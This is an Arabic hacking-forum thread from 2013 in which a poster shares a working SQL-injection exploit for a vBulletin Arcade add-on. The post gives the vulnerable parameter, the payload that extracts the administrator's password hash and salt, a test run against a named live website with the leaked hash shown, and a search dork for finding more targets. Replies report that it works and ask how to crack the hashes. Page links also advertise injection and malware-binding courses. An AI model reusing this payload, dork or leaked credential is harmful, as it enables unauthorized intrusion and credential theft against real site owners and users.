1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ خبر ] كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

الموضوع في 'آمن المواقع والسيرفرات' بواسطة mafia, بتاريخ ‏23 مارس 2013.

كاتب الموضوع : mafia المشاهدات : 3,938 الردود : 24 ‏23 مارس 2013
حالة الموضوع:
مغلق
  1. غير متصل

    mafia
    rank
    Developer

    عضو منذ:
    ‏23 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    [​IMG]
    السلام عليكم ورحمة الله وبركاته

    مابي اطول الموضوع مثل ماهو واضح ثغرة في جميع الاصدارات التي تحمل ملف Arcade

    الملف المصاب
    :

    كود PHP:
    /arcade.php?act=Arcade&do=stats&comment=a&s_id=


    الاستغلال :

    كود PHP:
    /arcade.php?act=Arcade&do=stats&comment=a&s_id=AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,saltFROM user WHERE id 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)


    تجربة لعيون الشباب !!:{

    كود PHP:
    http://www.christianteenforums.com/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28*%29,CONCAT%28%28SELECT%20CONCAT%28password,0x3a,salt%29%20FROM%20user%20WHERE%20id%20=%201%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29


    النتائج :

    كود PHP:
    mySQL query errorUPDATE games_scores SET comment='a' WHERE s_id=AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,saltFROM user WHERE userid 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    mySQL errorDuplicate entry '839fbf5ab99638a9b389971e74ef93c0:kXdYHA3-s(@\Ukrq-pY}RZ{Y5bn}zZ1' for key 'group_key'
    mySQL error code
    DateFriday 22nd 2013f March 2013 10:58:51 PM


    هذا الهاش للادمن والسالت bl"eh"

    '839fbf5ab99638a9b389971e74ef93c0:kXdYHA3-s(@\Ukrq-pY}RZ{Y5bn}zZ1'

    دوك الثغرة :

    كود PHP:
    /arcade.php?act=Arcade Powered by vBulletin



    صورة توضيحية للثغرة

    [​IMG]


    GooD Luck
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    яднїм
    rankrank
    Developer

    عضو منذ:
    ‏2 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الوظيفة:
    ҢαƆк
    الإقامة:

    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    مبدع ,,

    الله يوفقك,,

    شكرا ً لكـ,,

    لا تحرمنا من جديدكـ
    &:":​
     


  4. غير متصل

    Abdullah
    rank
    Developer

    عضو منذ:
    ‏30 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    مصمم

    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    يعطيــــــi:q^:ـــــــك الـــــــف عافيـــــ:{1}:ــــــة
    مبدع حبيبي
    :{17}:​
     


  5. غير متصل

    AHMAD MOSAAD
    Developer

    عضو منذ:
    ‏31 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    Student
    الإقامة:

    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    شكرن​
     


  6. غير متصل

    Scorpion
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    بارك الله فيك
    .
    .
    يستفيدون منها الاعضاء
    &:":​
     


  7. غير متصل

    M.A.F.
    rank
    Developer

    عضو منذ:
    ‏26 فبراير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    جزاك الله خيرا ً على الثغرة ، شغالة تمام التمام و لكن للأسف فك تشفير هاش المنتديات صعب للغاية ، يعني أنا حصلت على أكثر من هاش من قبل و لم أستطع فكه ، يا ريت لو تفيدنا بموقع يفك الهاش بسهولة :)
     


  8. غير متصل

    عراقي انا
    rank
    Developer

    عضو منذ:
    ‏22 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    صاحب الموضوع بارك الله فيك اخي العزيز على الموضوع


    هههههههه هنا المشاكل بالهاشات واكثر المواقع تخمين موناجح تنفع مع الهاشات السهله
    &:"
     


  9. غير متصل

    SN!p3r_GS
    rank
    Developer

    عضو منذ:
    ‏11 سبتمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    معروفه ومافي تطوير


    واسهل شي فك الهاشات مااعرف شنو الصعوبه i:q4^:​
     


  10. غير متصل

    Life
    rankrank
    Developer

    عضو منذ:
    ‏31 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: كسر البرايفت وتطويف 0day ثغرة في جميع اصدارات vBulletin

    يانجم ياريت تفيدنا بكسر الهاشات ونكون شاكرين لك &:"

     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...